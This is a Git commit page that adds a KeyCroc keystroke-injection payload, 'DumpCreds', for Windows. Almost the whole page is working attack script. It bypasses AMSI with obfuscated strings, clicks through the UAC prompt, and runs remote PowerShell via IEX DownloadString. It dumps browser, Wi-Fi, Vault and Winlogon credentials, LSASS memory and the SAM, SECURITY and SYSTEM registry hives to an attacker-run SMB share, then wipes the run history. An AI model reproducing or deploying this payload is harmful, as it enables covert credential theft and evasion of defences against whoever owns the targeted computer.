hak5
/
keycroc-payloads
mirror of https://github.com/hak5/keycroc-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create win_dumpcreds.txt

pull/13/head
cerebro11 2020-08-01 22:15:44 +02:00 committed by GitHub
parent 7035d43c55
commit 9d9b205f5a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 171 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

171
library/credentials/DumpCreds/win_dumpcreds.txt Normal file
View File

@ -0,0 +1,171 @@
# Title: DumpCreds
# Author: cerebro11
# Date: 01/08/2020
#
# Description: Dumps the usernames & plaintext passwords from
# Browsers (Chrome, FireFox)
# Windows Vault
# Wi-Fi
# sam, system, security from Registry => SAM Hashes (only if AdminMode=True)
# LSASS dump => Mimikatz Dump (only if AdminMode=True)
# System Information
# Creds : Payload based on DumpCreds by QDBA
#
# Get-ChromeDump.ps1 should be downloaded from "https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-ChromeDump.ps1" and placed in "/tools/DumpCreds/"
# Get-FoxDump.ps1 should be downloaded from "https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-FoxDump.ps1" and placed in "/tools/DumpCreds/"
# Out-Minidump.ps1 should be downloaded from "https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1" and placed in "/tools/DumpCreds/"
# Requirements: Impacket, gohttp
MATCH __dumpcreds
LOOTDIR=/root/loot/dumpcreds
# Specify target's PC keyboard language
#export DUCKY_LANG=fr
# Switch to ETHERNET ATTACKMODE (Windows)
if [ ! -f "/tmp/vidpid" ]
then
ATTACKMODE RNDIS_ETHERNET HID VID_0X1234 PID_0X5678
else
VENDOR=$(cat /tmp/vidpid | cut -d: -f1)
PRODUCT=$(cat /tmp/vidpid | cut -d: -f2)
ATTACKMODE RNDIS_ETHERNET HID VID_0X$VENDOR PID_0X$PRODUCT
fi
QUACK DELAY 5000
# Get KeyCroc's LAN IP
croc_ip=$(ifconfig usb0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)
SHARE="\\\\${croc_ip}\\s"
# Loot directory
timestamp=$(date +%s)
mkdir -p ${LOOTDIR}/${timestamp}
# Temporary www and smb directories
mkdir -p /tmp/www
mkdir -p /tmp/smb
# Prepare scripts
cp -r /tools/DumpCreds/* /tmp/www/
# Start HTTP and SMB servers
sleep 2
cd /tmp/www/ && gohttp -p 80 &
sleep 2
python /tools/impacket/examples/smbserver.py s /tmp/smb -smb2support &
# Launch cmd as admin (red window)
QUACK LOCK
QUACK GUI-r
QUACK STRING "powershell -NoP -NonI -W Hidden -Exec Bypass -c \"Start-Process cmd -A '/t:4f /k mode con lines=1 cols=500' -Verb runAs\""
QUACK ENTER
QUACK DELAY 200
# Bypass UAC :: Change "ALT y" and "ALT n" according to your language i.e. for us it is ALT y (Yes) and ALT n (No)
# If Admin, UAC prompt will open and Alt y will be used (Alt n won't do anything), if not Admin, Alt n will be used to dismiss (Alt y won't do anything)
QUACK DELAY 500
QUACK ALT-y
QUACK DELAY 200
QUACK ENTER
QUACK DELAY 500
QUACK ALT-n
QUACK DELAY 200
QUACK ENTER
# Start Attack
# Launch powershell and extract systeminfo
sleep 2
QUACK STRING "powershell -NoP -NonI -W Hidden -Exec Bypass"
QUACK ENTER
QUACK STRING "[Ref].Assembly.GetType('Sy'+'stem.Managem'+'ent.Aut'+'omation.Am'+'s'+'iUt'+'ils').GetField('a'+'m'+'si'+'In'+'itFa'+'iled','No'+'nPub'+'lic,Static').SetValue(\$null,\$true)"
QUACK ENTER
QUACK STRING "\$isAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] \"Administrator\")"
QUACK ENTER
QUACK STRING "net use $SHARE /user:\"anonymous\" \"\""
QUACK ENTER
QUACK STRING "systeminfo | Out-file $SHARE\\DumpCreds_systeminfo.txt"
QUACK ENTER
QUACK DELAY 200
# Extract Chrome, Firefox Data
QUACK STRING "IEX (New-Object Net.Webclient).DownloadString('http://${croc_ip}/Get-ChromeDump.ps1');"
QUACK ENTER
QUACK STRING "Stop-Process -name chrome -ErrorAction SilentlyContinue -Force; sleep 10; Get-ChromeDump -OutFile $SHARE\\DumpCreds_ChromeDump.txt"
QUACK ENTER
QUACK DELAY 200
QUACK STRING "IEX (New-Object Net.Webclient).DownloadString('http://${croc_ip}/Get-FoxDump.ps1');"
QUACK ENTER
QUACK STRING "Stop-Process -name firefox -ErrorAction SilentlyContinue -Force; sleep 10; Get-FoxDump -OutFile $SHARE\\DumpCreds_FoxDump.txt"
QUACK ENTER
QUACK DELAY 200
# Extract Wi-Fi Data
QUACK STRING "(netsh wlan show profiles) | Select-String \"\:(.+)\$\" | %{\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | Select-String \"^.+Cont.+\\W+\\:(.+)\$\" | %{\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }} | Format-Table -AutoSize | Out-File $SHARE\\DumpCreds_WiFiDump.txt"
QUACK ENTER
QUACK DELAY 200
# Extract Windows Credentials from PasswordVault and WinLogon registry
QUACK STRING "[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];(New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() | % { \$_.RetrievePassword();\$_ } | Out-File $SHARE\\DumpCreds_VaultDump.txt"
QUACK ENTER
QUACK DELAY 200
QUACK STRING "reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon\" | findstr /i \"DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername\" | Out-File $SHARE\\DumpCreds_WinLogon.txt"
QUACK ENTER
QUACK DELAY 200
# If Admin, dump memory of lsass.exe and sam/security/system registries (!WARNING TAKES TIME TO COMPLETE!#)
QUACK STRING "if (\$isAdmin) { IEX (New-Object Net.Webclient).DownloadString('http://${croc_ip}/Out-Minidump.ps1');}"
QUACK ENTER
QUACK STRING "if (\$isAdmin) { Get-Process lsass | Out-Minidump -DumpFilePath $SHARE}"
QUACK ENTER
QUACK DELAY 200
QUACK STRING "if (\$isAdmin) { reg.exe save hklm\\sam $SHARE\\sam }"
QUACK ENTER
QUACK STRING "if (\$isAdmin) { reg.exe save hklm\\security $SHARE\\security }"
QUACK ENTER
QUACK STRING "if (\$isAdmin) { reg.exe save hklm\\system $SHARE\\system }"
QUACK ENTER
QUACK DELAY 200
QUACK STRING "echo EXFILTRATION_COMPLETE > $SHARE\\EXFILTRATION_COMPLETE"
QUACK ENTER
# Remove Run History
QUACK STRING "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
QUACK ENTER
QUACK DELAY 200
QUACK STRING "exit"
QUACK ENTER
QUACK UNLOCK
# Wait until files are done copying.
while ! [ -f /tmp/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done
# Start Cleanup
sleep 2
# Delete Exfil file
rm /tmp/smb/EXFILTRATION_COMPLETE
# Move data to loot directory
mv /tmp/smb/* ${LOOTDIR}/${timestamp}
# Clean up temporary directories
rm -rf /tmp/www/
rm -rf /tmp/smb/
# Stop HTTP and SMB servers
kill $(ps -C "gohttp -p 80" -o pid --no-headers)
kill $(ps -C "python /tools/impacket/examples/smbserver.py s /tmp/smb -smb2support" -o pid --no-headers)
# Deactivate ETHERNET ATTACKMODE
if [ ! -f "/tmp/vidpid" ]
then
ATTACKMODE HID VID_0X1234 PID_0X5678
else
VENDOR=$(cat /tmp/vidpid | cut -d: -f1)
PRODUCT=$(cat /tmp/vidpid | cut -d: -f2)
ATTACKMODE HID VID_0X$VENDOR PID_0X$PRODUCT
fi
# Complete